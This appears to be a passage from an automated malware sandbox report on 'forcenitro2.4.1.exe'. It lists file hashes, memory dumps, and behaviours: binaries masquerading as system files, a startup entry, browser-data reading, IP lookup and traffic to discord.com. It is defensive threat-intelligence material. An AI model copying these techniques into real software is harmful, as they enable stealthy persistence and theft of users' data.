memory/2084-333-0x000002BC668F3000-0x000002BC668F5000-memory.dmp
memory/2084-387-0x000002BC668F6000-0x000002BC668F8000-memory.dmp
memory/656-388-0x000001E370456000-0x000001E370458000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 44abc03c03e5b5d968f9029b02ff83ae |
| SHA1 | a5e0d750a8f232ae1ed8e15cac24419934537390 |
| SHA256 | 25de1ebb440ce22ec5cb3d899a3f5d1c30d792a2f26dcdc262fc30a1dd0c1017 |
| SHA512 | 53c9e955b9426f5af40e22cbdd1267aafb420e0fce2c1372fef6e298bf522ad7998ba051dd144ef297601296fcf143794e692f2c7cb53723d4770a09d71f86ee |
memory/3560-394-0x0000000000000000-mapping.dmp
memory/1888-395-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 44abc03c03e5b5d968f9029b02ff83ae |
| SHA1 | a5e0d750a8f232ae1ed8e15cac24419934537390 |
| SHA256 | 25de1ebb440ce22ec5cb3d899a3f5d1c30d792a2f26dcdc262fc30a1dd0c1017 |
| SHA512 | 53c9e955b9426f5af40e22cbdd1267aafb420e0fce2c1372fef6e298bf522ad7998ba051dd144ef297601296fcf143794e692f2c7cb53723d4770a09d71f86ee |
memory/2084-422-0x000002BC668F8000-0x000002BC668F9000-memory.dmp
memory/656-424-0x000001E370458000-0x000001E370459000-memory.dmp
memory/3560-426-0x000001F6248C0000-0x000001F6248C2000-memory.dmp
memory/3560-429-0x000001F6248C3000-0x000001F6248C5000-memory.dmp
memory/1888-432-0x0000019E1C830000-0x0000019E1C832000-memory.dmp
memory/2108-434-0x00000000065E0000-0x00000000065E1000-memory.dmp
memory/1888-436-0x0000019E1C833000-0x0000019E1C835000-memory.dmp
memory/2108-440-0x0000000006CE0000-0x0000000006CE1000-memory.dmp
memory/1888-443-0x0000019E1C836000-0x0000019E1C838000-memory.dmp
memory/3560-439-0x000001F6248C6000-0x000001F6248C8000-memory.dmp
memory/2108-461-0x0000000006880000-0x0000000006881000-memory.dmp
memory/2108-480-0x0000000006C40000-0x0000000006C41000-memory.dmp
memory/1888-482-0x0000019E1C838000-0x0000019E1C839000-memory.dmp
memory/3560-483-0x000001F6248C8000-0x000001F6248C9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cd68df29efd5621959ec462317ed7e21 |
| SHA1 | 6f988d148df6624cdefb7491b30f505b4665777b |
| SHA256 | 257a072925b4856e4603639bd71bdb96e684d73980e484e05a50870a308d1d7c |
| SHA512 | f0614b97966b2250ed28c685991ee51bddb9c92c08a60e5a5adfaac83361f2a88d7447ebc605eeeebfea9f912af3d56160a4a48a0a276cc1488992a185de9405 |
memory/2108-486-0x0000000007770000-0x0000000007771000-memory.dmp
memory/1828-487-0x0000000000000000-mapping.dmp
memory/2504-488-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
memory/2504-491-0x0000000000510000-0x0000000000511000-memory.dmp
memory/2504-493-0x0000000000D20000-0x0000000000D21000-memory.dmp
memory/4064-494-0x0000000000000000-mapping.dmp
memory/3188-495-0x0000000000000000-mapping.dmp
memory/2152-496-0x0000000000000000-mapping.dmp
memory/2504-497-0x0000000000F50000-0x0000000000F52000-memory.dmp
memory/2152-500-0x0000000000C10000-0x0000000000C11000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
memory/3152-503-0x0000000000000000-mapping.dmp
memory/2772-504-0x0000000000000000-mapping.dmp
memory/2500-505-0x0000000000000000-mapping.dmp
memory/2152-506-0x000000001C810000-0x000000001C812000-memory.dmp
memory/3576-507-0x0000000000000000-mapping.dmp
C:\Windows\System32\services32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
memory/2236-510-0x0000000000000000-mapping.dmp
C:\Windows\system32\services32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
memory/2724-513-0x0000000000000000-mapping.dmp
memory/3576-514-0x000000001C5B0000-0x000000001C5B2000-memory.dmp
memory/2068-515-0x0000000000000000-mapping.dmp
memory/4072-519-0x0000000000000000-mapping.dmp
memory/2588-520-0x0000000000000000-mapping.dmp
C:\Windows\System32\services64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
C:\Windows\system32\services64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
memory/3480-528-0x0000000000000000-mapping.dmp
memory/2732-527-0x0000000000000000-mapping.dmp
memory/4040-531-0x0000000000000000-mapping.dmp
memory/736-530-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cd68df29efd5621959ec462317ed7e21 |
| SHA1 | 6f988d148df6624cdefb7491b30f505b4665777b |
| SHA256 | 257a072925b4856e4603639bd71bdb96e684d73980e484e05a50870a308d1d7c |
| SHA512 | f0614b97966b2250ed28c685991ee51bddb9c92c08a60e5a5adfaac83361f2a88d7447ebc605eeeebfea9f912af3d56160a4a48a0a276cc1488992a185de9405 |
memory/2068-561-0x0000018D1FF80000-0x0000018D1FF82000-memory.dmp
memory/2068-563-0x0000018D1FF83000-0x0000018D1FF85000-memory.dmp
memory/2588-566-0x000000001C1D0000-0x000000001C1D2000-memory.dmp
memory/4040-567-0x000001B2FA530000-0x000001B2FA532000-memory.dmp
memory/4040-571-0x000001B2FA533000-0x000001B2FA535000-memory.dmp
memory/2068-574-0x0000018D1FF86000-0x0000018D1FF88000-memory.dmp
memory/4040-577-0x000001B2FA536000-0x000001B2FA538000-memory.dmp
memory/3088-604-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 803157c6e0a67641ddc338e0100a6b35 |
| SHA1 | 7f64c4ea3951f3870b32b47d36b5aa8d11f1e240 |
| SHA256 | e553c22f82d3fdf0f6c6b92de5633987bffb5a3cd5a29961bddca59ba5c8df87 |
| SHA512 | 12919f9a829603ea3bfa54afff2a966c129d123997ca49684bef54074b21527db1e6447329e85c14402d8a574ec0235d3ffe703705706ab07e582d3de468d54f |
memory/1144-610-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 803157c6e0a67641ddc338e0100a6b35 |
| SHA1 | 7f64c4ea3951f3870b32b47d36b5aa8d11f1e240 |
| SHA256 | e553c22f82d3fdf0f6c6b92de5633987bffb5a3cd5a29961bddca59ba5c8df87 |
| SHA512 | 12919f9a829603ea3bfa54afff2a966c129d123997ca49684bef54074b21527db1e6447329e85c14402d8a574ec0235d3ffe703705706ab07e582d3de468d54f |
memory/2068-626-0x0000018D1FF88000-0x0000018D1FF89000-memory.dmp
memory/4040-627-0x000001B2FA538000-0x000001B2FA539000-memory.dmp
memory/3088-628-0x00000284F4240000-0x00000284F4242000-memory.dmp
memory/3088-629-0x00000284F4243000-0x00000284F4245000-memory.dmp
memory/1144-630-0x0000019934CA0000-0x0000019934CA2000-memory.dmp
memory/1144-631-0x0000019934CA3000-0x0000019934CA5000-memory.dmp
memory/3088-686-0x00000284F4246000-0x00000284F4248000-memory.dmp
memory/1144-687-0x0000019934CA6000-0x0000019934CA8000-memory.dmp
memory/3088-688-0x00000284F4248000-0x00000284F4249000-memory.dmp
memory/1144-689-0x0000019934CA8000-0x0000019934CA9000-memory.dmp
memory/2240-690-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 31680e00b5d874bcd3aec2300eaff3a4 |
| SHA1 | b0af5e861abf5ee10a8f0cdfecf0ef10dc8bd23d |
| SHA256 | 8c770ccc1813dae6b1f431d83064a69f52c854397d1183adeb1e756719ded643 |
| SHA512 | e0c4c7f65a0dd8a1d14ba2ff2a41819649257b50dcaf00f823731737ca4aeb72329b3b3bd09bb0d78df6fc47f56bf306e7218aa06473008c744ca1d2c577938e |
memory/2116-696-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 31680e00b5d874bcd3aec2300eaff3a4 |
| SHA1 | b0af5e861abf5ee10a8f0cdfecf0ef10dc8bd23d |
| SHA256 | 8c770ccc1813dae6b1f431d83064a69f52c854397d1183adeb1e756719ded643 |
| SHA512 | e0c4c7f65a0dd8a1d14ba2ff2a41819649257b50dcaf00f823731737ca4aeb72329b3b3bd09bb0d78df6fc47f56bf306e7218aa06473008c744ca1d2c577938e |
memory/2240-744-0x0000019ECBCC0000-0x0000019ECBCC2000-memory.dmp
memory/2240-747-0x0000019ECBCC3000-0x0000019ECBCC5000-memory.dmp
memory/2116-750-0x00000238E5740000-0x00000238E5742000-memory.dmp
memory/2116-752-0x00000238E5743000-0x00000238E5745000-memory.dmp
memory/2240-753-0x0000019ECBCC6000-0x0000019ECBCC8000-memory.dmp
memory/2116-755-0x00000238E5746000-0x00000238E5748000-memory.dmp
memory/2200-772-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f5e9f26f32cfa3e93352097a2ee0d2c |
| SHA1 | bab02611b3029c377ce4e2da66212981581dd477 |
| SHA256 | e475d3e2e210687f2ba9475b687a9021c98ad0a62582e888a4fefeac386fd2a7 |
| SHA512 | 0785e7bee4f207801e582200927effc40ed8408bf248e2be3d37b986e59357cf3ed62348b09870ff0d69bab64a8913bfcb07e9e7cd3251cbb161ffafa8c93be9 |
memory/3396-778-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f5e9f26f32cfa3e93352097a2ee0d2c |
| SHA1 | bab02611b3029c377ce4e2da66212981581dd477 |
| SHA256 | e475d3e2e210687f2ba9475b687a9021c98ad0a62582e888a4fefeac386fd2a7 |
| SHA512 | 0785e7bee4f207801e582200927effc40ed8408bf248e2be3d37b986e59357cf3ed62348b09870ff0d69bab64a8913bfcb07e9e7cd3251cbb161ffafa8c93be9 |
memory/2240-795-0x0000019ECBCC8000-0x0000019ECBCC9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 974071559cce6cdc9dded61befd2a175 |
| SHA1 | 67777b2c97928ff7e4ab9b42079b58b09aef5f42 |
| SHA256 | 1eeb8211f6d320eb38ad24892f5297f16fad865d2e0a8163c86b89d39fea11dd |
| SHA512 | 8c59e796cecab215838f64e28d1c7d1235b8bf4ab53ae2977cceb28076e971b815ce7dadfdf366cfdcceefb66ac5f23d59189f2c53ac1f0aaf1e0fabc47fc91a |
memory/2772-860-0x0000000000000000-mapping.dmp
memory/2220-861-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 603bb9cb905666cc9f5776d5ddccc0be |
| SHA1 | 4880ee993d1076095f1d22d1337f93584ceeea82 |
| SHA256 | 2999bf95a33e43e5e080cb07aaa7ca29c058a1b0d3668f17d33819cdf971c47b |
| SHA512 | 052441596e9f1b623f4812eac253963b72363aba7cc8c9da3795cd8dbc135e42b070c59ca584537d9e1754641543a116ee1ef0a9ea66060ec28ddf1545b2bff8 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log
| MD5 | 84f2160705ac9a032c002f966498ef74 |
| SHA1 | e9f3db2e1ad24a4f7e5c203af03bbc07235e704c |
| SHA256 | 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93 |
| SHA512 | f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57 |
memory/2888-868-0x0000000000000000-mapping.dmp
memory/3964-870-0x0000000000000000-mapping.dmp
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
| MD5 | efc8230e7037830809fb4be476a81463 |
| SHA1 | f0d0d2ffa70861d511b558a1583777409da1590b |
| SHA256 | a0e2bfb96c898e0b229eec491a324465f61bcff94d6cbe068bf5f0204b18da09 |
| SHA512 | 3e3294b29d173a32d0ada97009be99b095bf5a9512a64cf4912df4b7b7638c7c0686d204193e614cf7bb9f83fd0f0a0ef70ea94e44182558cdbb51d341ae36bc |
memory/372-869-0x0000000000000000-mapping.dmp
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
| MD5 | efc8230e7037830809fb4be476a81463 |
| SHA1 | f0d0d2ffa70861d511b558a1583777409da1590b |
| SHA256 | a0e2bfb96c898e0b229eec491a324465f61bcff94d6cbe068bf5f0204b18da09 |
| SHA512 | 3e3294b29d173a32d0ada97009be99b095bf5a9512a64cf4912df4b7b7638c7c0686d204193e614cf7bb9f83fd0f0a0ef70ea94e44182558cdbb51d341ae36bc |
memory/1504-875-0x0000000000000000-mapping.dmp
memory/1424-876-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | 462eab047978bb8b856ee7660a39877c |
| SHA1 | 4bd4d796e8404ce7a06795a9423b9e30b4d831ab |
| SHA256 | 12799e75db154a83b20b504e52d1b1f97ce40bef57ea6afac625796eb0acf29a |
| SHA512 | 0281647b9b6df2a4ab9032a667dd6349cd094c9dff6303e91af5e4868d2839399a4514673702fb71d21a266a642a40c26ab773f4e03c624c2a56ca6872e3de7e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
| MD5 | 84f2160705ac9a032c002f966498ef74 |
| SHA1 | e9f3db2e1ad24a4f7e5c203af03bbc07235e704c |
| SHA256 | 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93 |
| SHA512 | f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57 |
memory/2080-885-0x0000000000000000-mapping.dmp
memory/2744-886-0x0000000000000000-mapping.dmp
C:\Windows\system32\Microsoft\Libs\sihost64.exe
| MD5 | 8cd78b1f37ca1dcfa40793bf889843ac |
| SHA1 | a765120e59a855ae3e56d4b954d03f6ea30ec24b |
| SHA256 | 79bb0e67cb74438a0110a4a4a59d43b25ba9e8cbe2f1e4cbe51ff2592b4cb7c0 |
| SHA512 | 765e4a134d923a39f05956d271d56ae1dab95e25f6de708e5499fbf991b770a9a6960e4083b8e714e4a79f1fde9e2aef4fa9bd9e7762f960f9cb45939e7114be |
C:\Windows\System32\Microsoft\Libs\sihost64.exe
| MD5 | 8cd78b1f37ca1dcfa40793bf889843ac |
| SHA1 | a765120e59a855ae3e56d4b954d03f6ea30ec24b |
| SHA256 | 79bb0e67cb74438a0110a4a4a59d43b25ba9e8cbe2f1e4cbe51ff2592b4cb7c0 |
| SHA512 | 765e4a134d923a39f05956d271d56ae1dab95e25f6de708e5499fbf991b770a9a6960e4083b8e714e4a79f1fde9e2aef4fa9bd9e7762f960f9cb45939e7114be |
memory/580-891-0x0000000000000000-mapping.dmp
memory/2708-894-0x0000000000000000-mapping.dmp
memory/3544-895-0x0000000000000000-mapping.dmp
memory/2700-897-0x00000001402F327C-mapping.dmp
memory/2732-898-0x0000000000000000-mapping.dmp
memory/1144-900-0x0000000000000000-mapping.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210408
Max time kernel
11s
Max time network
25s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1652 wrote to memory of 1172 | N/A | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe |
| PID 1652 wrote to memory of 1172 | N/A | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe |
| PID 1652 wrote to memory of 1172 | N/A | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe
"C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe"
C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe
"C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe"
Network
Files
memory/1172-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI16522\python39.dll
| MD5 | c4b75218b11808db4a04255574b2eb33 |
| SHA1 | f4a3497fb6972037fb271cfdc5b404a4b28ccf07 |
| SHA256 | 53f27444e1e18cc39bdb733d19111e392769e428b518c0fc0839965b5a5727a2 |
| SHA512 | 0b7ddbe6476cc230c7bdd96b5756dfb85ab769294461d1132f0411502521a2197c0f27c687df88a2cd1ab53332eaa30f17fa65f93dac3f5e56ed2b537232e69c |
\Users\Admin\AppData\Local\Temp\_MEI16522\python39.dll
| MD5 | c4b75218b11808db4a04255574b2eb33 |
| SHA1 | f4a3497fb6972037fb271cfdc5b404a4b28ccf07 |
| SHA256 | 53f27444e1e18cc39bdb733d19111e392769e428b518c0fc0839965b5a5727a2 |
| SHA512 | 0b7ddbe6476cc230c7bdd96b5756dfb85ab769294461d1132f0411502521a2197c0f27c687df88a2cd1ab53332eaa30f17fa65f93dac3f5e56ed2b537232e69c |
Analysis: behavioral18
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
33s
Max time network
134s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsAnalyzer | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe
"C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe"
C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe
"C:\Users\Admin\AppData\Local\Temp\forcenitro2.4.1.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 50.16.238.218:443 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | discord.com | udp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
| N/A | 162.159.137.232:443 | discord.com | tcp |
Files
memory/200-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI38402\python39.dll
| MD5 | c4b75218b11808db4a04255574b2eb33 |
| SHA1 | f4a3497fb6972037fb271cfdc5b404a4b28ccf07 |
| SHA256 | 53f27444e1e18cc39bdb733d19111e392769e428b518c0fc0839965b5a5727a2 |
| SHA512 | 0b7ddbe6476cc230c7bdd96b5756dfb85ab769294461d1132f0411502521a2197c0f27c687df88a2cd1ab53332eaa30f17fa65f93dac3f5e56ed2b537232e69c |
\Users\Admin\AppData\Local\Temp\_MEI38402\python39.dll
| MD5 | c4b75218b11808db4a04255574b2eb33 |
| SHA1 | f4a3497fb6972037fb271cfdc5b404a4b28ccf07 |
| SHA256 | 53f27444e1e18cc39bdb733d19111e392769e428b518c0fc0839965b5a5727a2 |
| SHA512 | 0b7ddbe6476cc230c7bdd96b5756dfb85ab769294461d1132f0411502521a2197c0f27c687df88a2cd1ab53332eaa30f17fa65f93dac3f5e56ed2b537232e69c |
C:\Users\Admin\AppData\Local\Temp\_MEI38402\VCRUNTIME140.dll
| MD5 | 7942be5474a095f673582997ae3054f1 |
| SHA1 | e982f6ebc74d31153ba9738741a7eec03a9fa5e8 |
| SHA256 | 8ee6b49830436ff3bec9ba89213395427b5535813930489f118721fd3d2d942c |
| SHA512 | 49fbc9d441362b65a8d78b73d4fdcf988f22d38a35a36a233fcd54e99e95e29b804be7eabe2b174188c7860ebb34f701e13ed216f954886a285bed7127619039 |
\Users\Admin\AppData\Local\Temp\_MEI38402\VCRUNTIME140.dll
| MD5 | 7942be5474a095f673582997ae3054f1 |
| SHA1 | e982f6ebc74d31153ba9738741a7eec03a9fa5e8 |
| SHA256 | 8ee6b49830436ff3bec9ba89213395427b5535813930489f118721fd3d2d942c |
| SHA512 | 49fbc9d441362b65a8d78b73d4fdcf988f22d38a35a36a233fcd54e99e95e29b804be7eabe2b174188c7860ebb34f701e13ed216f954886a285bed7127619039 |
C:\Users\Admin\AppData\Local\Temp\_MEI38402\base_library.zip
| MD5 | 3c9567cdb28edb96e1491f1787915c34 |
| SHA1 | 0cead74ca10f1dc9af5135aa2b951bdffb087c19 |
| SHA256 | eb5cf3a9aef9130c053ddb40b50fe505356eb0d7001bc62022aa33b9f9f8908c |
| SHA512 | e43671696d2b4ba20fcfce5dfe0da18cecb668f9213ffd62a4874c41de4798fc51ab02b77e1b05809eff8124c5de2d2b01d1f8f2482ab3ac0d8738ae7ebf3525 |
C:\Users\Admin\AppData\Local\Temp\_MEI38402\_ctypes.pyd
| MD5 | b74f6285a790ffd7e9ec26e3ab4ca8df |
| SHA1 | 7e023c1e4f12e8e577e46da756657fd2db80b5e8 |
| SHA256 | c1e3e9548243ca523f1941990477723f57a1052965fccc8f10c2cfae414a6b8a |
| SHA512 | 3a700638959cbd88e8a36291af954c7ccf00f6101287fc8bd3221ee31bd91b7bd1830c7847d8c2f4f07c94bc233be32a466b915283d3d2c66abed2c70570c299 |
\Users\Admin\AppData\Local\Temp\_MEI38402\_ctypes.pyd
| MD5 | b74f6285a790ffd7e9ec26e3ab4ca8df |
| SHA1 | 7e023c1e4f12e8e577e46da756657fd2db80b5e8 |
| SHA256 | c1e3e9548243ca523f1941990477723f57a1052965fccc8f10c2cfae414a6b8a |
| SHA512 | 3a700638959cbd88e8a36291af954c7ccf00f6101287fc8bd3221ee31bd91b7bd1830c7847d8c2f4f07c94bc233be32a466b915283d3d2c66abed2c70570c299 |
C:\Users\Admin\AppData\Local\Temp\_MEI38402\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
\Users\Admin\AppData\Local\Temp\_MEI38402\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
\Users\Admin\AppData\Local\Temp\_MEI38402\_socket.pyd
| MD5 | 0df2287791c20a764e6641029a882f09 |
| SHA1 | 8a0aeb4b4d8410d837469339244997c745c9640c |
| SHA256 | 09ab789238120df329956278f68a683210692c9bcccb8cd548c771e7f9711869 |
| SHA512 | 60c24e38ba5d87f9456157e3f4501f4ffabce263105ff07aa611b2f35c3269ade458dbf857633c73c65660e0c37aee884b1c844b51a05ced6aed0c5d500006de |
C:\Users\Admin\AppData\Local\Temp\_MEI38402\win32api.pyd
| MD5 | 99a3fc100cd43ad8d4bf9a2975a2192f |
| SHA1 | cf37b7e17e51e7823b82b77c88145312df5b78cc |
| SHA256 | 1665ad12ad7cbf44ae63a622e8b97b5fd2ed0a092dfc5db8f09a9b6fdc2d57e7 |
| SHA512 | c0a60d5333925ce306ceb2eb38e13c6bae60d2663d70c37ecfc81b7346d12d9346550cb229d7c4f58d04dd182536d799e6eff77996d712fc177b1f5af7f4a4f2 |
\Users\Admin\AppData\Local\Temp\_MEI38402\pythoncom39.dll
